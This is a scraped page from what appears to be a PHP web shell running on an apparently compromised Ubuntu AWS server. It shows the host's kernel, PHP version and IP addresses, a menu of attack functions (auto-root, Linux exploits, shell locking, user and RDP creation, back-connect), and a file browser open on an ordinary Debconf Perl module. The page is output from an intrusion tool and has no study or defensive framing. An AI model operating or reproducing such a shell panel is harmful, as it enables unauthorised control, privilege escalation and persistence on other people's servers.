Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.149.29.209
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
snap /
core /
17200 /
usr /
share /
perl5 /
Debconf /
DbDriver /
[ HOME SHELL ]
Name
Size
Permission
Action
Backup.pm
1.6
KB
-rw-r--r--
Cache.pm
4.71
KB
-rw-r--r--
Copy.pm
950
B
-rw-r--r--
Debug.pm
950
B
-rw-r--r--
DirTree.pm
1.94
KB
-rw-r--r--
Directory.pm
3.52
KB
-rw-r--r--
File.pm
3.55
KB
-rw-r--r--
LDAP.pm
6.08
KB
-rw-r--r--
PackageDir.pm
3.58
KB
-rw-r--r--
Pipe.pm
1.74
KB
-rw-r--r--
Stack.pm
5.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Copy.pm
#!/usr/bin/perl -w # This file was preprocessed, do not edit! package Debconf::DbDriver::Copy; use strict; use Debconf::Log qw{:all}; use base 'Debconf::DbDriver'; sub copy { my $this=shift; my $item=shift; my $src=shift; my $dest=shift; debug "db $this->{name}" => "copying $item from $src->{name} to $dest->{name}"; my @owners=$src->owners($item); if (! @owners) { @owners=("unknown"); } foreach my $owner (@owners) { my $template = Debconf::Template->get($src->getfield($item, 'template')); my $type=""; $type = $template->type if $template; $dest->addowner($item, $owner, $type); } foreach my $field ($src->fields($item)) { $dest->setfield($item, $field, $src->getfield($item, $field)); } foreach my $flag ($src->flags($item)) { $dest->setflag($item, $flag, $src->getflag($item, $flag)); } foreach my $var ($src->variables($item)) { $dest->setvariable($item, $var, $src->getvariable($item, $var)); } } 1
Close